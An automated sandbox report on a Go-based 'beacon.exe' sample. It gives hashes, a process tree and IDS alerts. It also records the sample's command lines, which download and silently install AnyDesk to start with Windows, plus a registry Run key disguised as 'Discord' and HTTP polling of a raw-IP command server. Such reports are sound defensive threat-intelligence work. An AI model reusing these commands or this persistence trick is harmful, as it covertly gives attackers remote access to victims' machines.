File name: beacon.exe

Full analysis: https://app.any.run/tasks/4bbd8315-2641-429f-8aa2-05025c77c48c
Verdict: Malicious activity
Analysis date: April 15, 2025, 17:14:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
golang
anydesk
rmm-tool
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 15 sections
MD5: B6DA6E98198299498ABE1B10EAEC5F74
SHA1: B757D7C52B39633D40519F6092ECBDF5C37C1150
SHA256: F108A0526F6C52EF8C11806839846E85D5BA2984578E2403CD8F7EAECF828018
SSDEEP: 98304:KN3od5CrxF/mytwEqNaOhEO1TP6qQNrZSCcrBG9kvQnSTX22FaAdUN0bkc9CMtsh:hl/T1W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • beacon.exe (PID: 7324)
  • SUSPICIOUS

    • Execution of CURL command

      • cmd.exe (PID: 5776)
      • beacon.exe (PID: 7324)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 5776)
      • beacon.exe (PID: 7324)
    • Application launched itself

      • cmd.exe (PID: 5776)
    • Executable content was dropped or overwritten

      • curl.exe (PID: 7292)
    • Connects to the server without a host name

      • beacon.exe (PID: 7324)
    • ANYDESK mutex has been found

      • AnyDesk.exe (PID: 6676)
      • AnyDesk.exe (PID: 6944)
    • The executable file from the user directory is run by the CMD process

      • AnyDesk.exe (PID: 6944)
      • AnyDesk.exe (PID: 6676)
    • ANYDESK has been found

      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 5776)
  • INFO

    • Checks supported languages

      • beacon.exe (PID: 7324)
      • curl.exe (PID: 7292)
      • AnyDesk.exe (PID: 6676)
      • curl.exe (PID: 5008)
      • AnyDesk.exe (PID: 6944)
    • Application based on Golang

      • beacon.exe (PID: 7324)
    • Detects GO elliptic curve encryption (YARA)

      • beacon.exe (PID: 7324)
    • Reads the computer name

      • beacon.exe (PID: 7324)
      • curl.exe (PID: 7292)
      • AnyDesk.exe (PID: 6676)
      • curl.exe (PID: 5008)
      • AnyDesk.exe (PID: 6944)
    • Drops encrypted JS script (Microsoft Script Encoder)

      • beacon.exe (PID: 7324)
    • Execution of CURL command

      • cmd.exe (PID: 7276)
      • cmd.exe (PID: 3240)
    • Create files in a temporary directory

      • curl.exe (PID: 7292)
      • curl.exe (PID: 5008)
    • The sample compiled with english language support

      • curl.exe (PID: 7292)
    • Creates files or folders in the user directory

      • AnyDesk.exe (PID: 6676)
    • Reads the software policy settings

      • slui.exe (PID: 7452)
      • slui.exe (PID: 1040)
    • Checks proxy server information

      • slui.exe (PID: 1040)
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 3
CodeSize: 2659840
InitializedDataSize: 257024
UninitializedDataSize: -
EntryPoint: 0x74500
OSVersion: 6.1
ImageVersion: 1
SubsystemVersion: 6.1
Subsystem: Windows command line
No data.
Total processes: 147
Monitored processes: 13
Malicious processes: 1
Suspicious processes: 3

Behavior graph

Processes shown in the graph (in order): beacon.exe, conhost.exe, sppextcomobj.exe, slui.exe, cmd.exe, cmd.exe, curl.exe, anydesk.exe, slui.exe, cmd.exe, cmd.exe, curl.exe, anydesk.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID 1040
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules: c:\windows\system32\slui.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\user32.dll
PID 1188
CMD: cmd /C "echo2 "
Path: C:\Windows\System32\cmd.exe
Parent process: beacon.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules: c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll
PID 3240
CMD: cmd /C "curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe && AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win"
Path: C:\Windows\System32\cmd.exe
Parent process: beacon.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 11341829
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules: c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll
PID 5008
CMD: curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User: admin
Company: curl, https://curl.se/
Integrity Level: MEDIUM
Description: The curl executable
Exit code: 0
Version: 8.4.0
Modules: c:\windows\system32\curl.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\ws2_32.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\crypt32.dll, c:\windows\system32\ucrtbase.dll
PID 5776
CMD: cmd /C "cmd.exe /c curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe && AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win"
Path: C:\Windows\System32\cmd.exe
Parent process: beacon.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 11341829
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules: c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll
PID 6676
CMD: AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win
Path: C:\Users\admin\AppData\Local\Temp\AnyDesk.exe
Parent process: cmd.exe
User: admin
Company: AnyDesk Software GmbH
Integrity Level: MEDIUM
Description: AnyDesk
Exit code: 11341829
Version: 9.5.1
Modules: c:\users\admin\appdata\local\temp\anydesk.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll, c:\windows\syswow64\apphelp.dll, c:\windows\syswow64\winmm.dll
PID 6944
CMD: AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win
Path: C:\Users\admin\AppData\Local\Temp\AnyDesk.exe
Parent process: cmd.exe
User: admin
Company: AnyDesk Software GmbH
Integrity Level: MEDIUM
Description: AnyDesk
Exit code: 11341829
Version: 9.5.1
Modules: c:\users\admin\appdata\local\temp\anydesk.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll, c:\windows\syswow64\apphelp.dll, c:\windows\syswow64\winmm.dll
PID 7276
CMD: cmd.exe /c curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules: c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll
PID 7292
CMD: curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User: admin
Company: curl, https://curl.se/
Integrity Level: MEDIUM
Description: The curl executable
Exit code: 0
Version: 8.4.0
Modules: c:\windows\system32\curl.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\ws2_32.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\cryptsp.dll, c:\windows\system32\crypt32.dll
PID 7324
CMD: "C:\Users\admin\AppData\Local\Temp\beacon.exe"
Path: C:\Users\admin\AppData\Local\Temp\beacon.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Modules: c:\users\admin\appdata\local\temp\beacon.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\bcryptprimitives.dll, c:\windows\system32\powrprof.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\umpdc.dll
Total events: 1 791
Read events: 1 790
Write events: 1
Delete events: 0

Modification events

PID 7324 (beacon.exe)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Discord
Value: C:\Users\admin\AppData\Local\Temp\beacon.exe
Executable files: 1
Suspicious files: 0
Text files: 3
Unknown types: 0

Dropped files

PID | Process | Filename | Type
6676 | AnyDesk.exe | C:\Users\admin\AppData\Roaming\AnyDesk\system.conf~RF119131.TMP | -
MD5: - SHA256: -
7292 | curl.exe | C:\Users\admin\AppData\Local\Temp\AnyDesk.exe | executable
MD5: 77DD4393183A61D9D5FDAD9FFA79A2F7 SHA256: 6CCEA6A959128112613D7A82C067F8CCC78F05F1F8F47348FC9FECF269F0F21A
6676 | AnyDesk.exe | C:\Users\admin\AppData\Roaming\AnyDesk\ad.trace | text
MD5: 0EC6BFA55384B0581AC7E6EC3E52B2CF SHA256: 08B40B69D0C70190E5237E382B05D2B40A5488FF62A4915CDA33E8CF2545300E
6676 | AnyDesk.exe | C:\Users\admin\AppData\Roaming\AnyDesk\system.conf.new | text
MD5: 9C920C4985A86DEF63FB4039E458F5ED SHA256: 346A8D8B8D5946D55653DFB405293A787B8D757D7C83514946A0769282261AF0
6676 | AnyDesk.exe | C:\Users\admin\AppData\Roaming\AnyDesk\system.conf | text
MD5: 9C920C4985A86DEF63FB4039E458F5ED SHA256: 346A8D8B8D5946D55653DFB405293A787B8D757D7C83514946A0769282261AF0
HTTP(S) requests: 152
TCP/UDP connections: 32
DNS requests: 16
Threats: 293

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN / Reputation
5496 | MoUsoCoreWorker.exe | GET | 200 | 95.101.54.122:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown / whitelisted
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown
7324 | beacon.exe | POST | 201 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/connect | unknown
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown / whitelisted
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
6544 | svchost.exe | 40.126.32.134:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2104 | svchost.exe | 20.73.194.208:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 20.73.194.208:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5496 | MoUsoCoreWorker.exe | 95.101.54.122:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
7324 | beacon.exe | 193.124.117.89:80 | - | JSC Mediasoft ekspert | RU | unknown
3216 | svchost.exe | 172.211.123.248:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | FR | unknown
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
6544 | svchost.exe | 40.126.32.68:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.78
whitelisted
crl.microsoft.com
  • 95.101.54.122
  • 95.101.54.128
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 40.127.240.158
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
download.anydesk.com
  • 104.18.30.170
  • 104.18.31.170
whitelisted
c.pki.goog
  • 142.250.186.99
whitelisted
nexusrules.officeapps.live.com
  • 52.111.236.22
whitelisted

Threats

Class | Message
Misc activity | ET USER_AGENTS Go HTTP Client User-Agent
Misc activity | ET INFO Go-http-client User-Agent Observed Outbound
Misc activity | ET USER_AGENTS Go HTTP Client User-Agent
Misc activity | ET INFO Go-http-client User-Agent Observed Outbound
Misc activity | SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
Misc activity | ET INFO Go-http-client User-Agent Observed Outbound
Misc activity | ET USER_AGENTS Go HTTP Client User-Agent
Misc activity | ET INFO Go-http-client User-Agent Observed Outbound
Misc activity | ET USER_AGENTS Go HTTP Client User-Agent
Misc activity | ET USER_AGENTS Go HTTP Client User-Agent
No debug info